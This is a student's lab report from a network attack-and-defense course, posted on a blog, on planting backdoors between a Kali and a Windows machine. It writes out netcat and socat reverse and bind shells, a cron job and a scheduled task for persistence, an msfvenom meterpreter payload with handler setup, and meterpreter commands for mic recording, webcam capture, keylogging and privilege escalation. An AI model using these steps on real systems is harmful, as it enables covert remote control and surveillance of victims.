• 2019-2020-2 20175105王鑫浩 《网络对抗技术》Exp2 后门原理与实践


    2019-2020-2 20175105王鑫浩 《网络对抗技术》Exp2 后门原理与实践

    1.实验内容

    任务一

    (1)Linux获得Win Shell

    输入ifconfig查看到kali的IP地址为192.168.87.132

    输入nc -l -p 5105在Linux运行监听

    windows在命令窗口进入ncat文件目录,输入ncat.exe -e cmd.exe 192.168.0.10 5303,使Windows反弹连接Linux

    Linux下看到Windows的命令提示,可运行指令

    (2)Win获得Linux Shell:

    首先在Windows命令窗口中使用ipconfig查看主机IP地址 192.168.159.1

    windows在ncat.exe文件目录下输入ncat.exe -l -p 5105打开windows 监听

    Linux反弹连接windows:nc 192.168.159.1 5105 -e /bin/sh

    windows下获得一个linux shell,可运行指令

    (3)使用netcat获取主机操作Shell,cron启动

    Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。
    crontab指令增加一条定时任务,"-e"表示编辑。

    在kali端输入crontab -e,选择第二个编辑器,并添加3 * * * * /bin/netcat 192.168.3.27 5303 -e /bin/sh后保存退出,表示在每个小时的第3分钟执行后面的那条指令。

    定时器设置完成


    任务二 使用socat获取主机操作Shell, 任务计划启动

    右击计算机—>点击计算机管理->点击任务计划程序—>点击创建任务

    新建触发器

    新建操作,在程序或脚本中选择socat.exe文件的路径,添加参数中填写tcp-listen:5105 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5105,同时把cmd.exe的stderr重定向到stdout上,然后确定

    当时间到时,此时可以看到任务的状态为正在运行,同时会弹出一个cmd窗口。

    在kali中输入指令socat - tcp:192.168.159.1:5105,成功获得了一个shell


    任务三

    使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    在Kali中使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.87.132 LPORT=5105 -f exe > 20175105_backdoor.exe命令生成20175105_backdoor.exe文件,其中LHOST是Kali的IP
    在Windows下执行ncat.exe -lv 5105 > 20175105_backdoor.exe,使被控主机进入接收文件模式
    在kali中执行nc 192.168.159.1 5105 < 20175105_backdoor.exe

    MSF打开监听进程
    输入msfconsole进入msf控制台
    输入use exploit/multi/handler设置payload
    输入set payload windows/meterpreter/reverse_tcp使用和生成后门程序时相同的payload
    输入set LHOST 192.168.87.132,设置本地ip
    输入set LPORT 5105设置本地端口
    输入show options查看选项
    输入exploit开始监听

    在windows后门文件夹中运行后门程序
    在kali端获取Windows的shell,可以输入dir来验证


    任务四

    使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
    使用record_mic指令获取目标机截获一段音频
    使用webcam_snap指令获取目标机摄像头
    使用keyscan_startkeyscan_dump指令获取目标机击键记录
    使用screenshot指令获取目标机截图
    使用getuid指令查看当前用户
    使用getsystem指令进行提权操作


    3.问题与解决

    问题1:任务三传输后门文件时,未能找到文件。
    解决:关闭杀毒软件后,即可找到。

    4.基础问题回答

    (1)例举你能想到的一个后门进入到你系统中的可能方式?
    不慎下载钓鱼网站中的软件,与其他软件捆绑安装等。

    (2)例举你知道的后门如何启动起来(win及linux)的方式?
    被攻击者自己执行、以及本次实验中使用的任务计划程序等

    (3)Meterpreter有哪些给你映像深刻的功能?
    截取音频、启动摄像头、提取权限

    (4)如何发现自己有系统有没有被安装后门?
    答:使用杀毒软件,检查进程、端口使用情况等。

    5.实验总结与体会

    答:在信息安全技术的课程中已经操作过一次类似实验,二者不同的是,信安更侧重于程序如何隐藏,网络对抗更侧重于其中原理,印象最深刻的是留下后门后,可以任意操作被攻击者的电子产品,Meterpreter的功能之强大,令人咋舌。

  • 相关阅读:
    NetCore指令集和
    在WPF中的Canvas上实现控件的拖动、缩放
    WPF 窗体中的 Canvas 限定范围拖动 鼠标滚轴改变大小
    利用百度API(js),怎样通过地址获取经纬度
    讨论一下hibernate如何动态注册一个动态生成的实体类
    大端序vs小端序
    influxdb+telegraf+grafana实现nginx监控
    python库pillow:实现生成图片并加水印
    mac使用之设置vim colors
    学习python库:elasticsearch-dsl
  • 原文地址:https://www.cnblogs.com/wxhblogs/p/12549735.html
Copyright © 2020-2023  润新知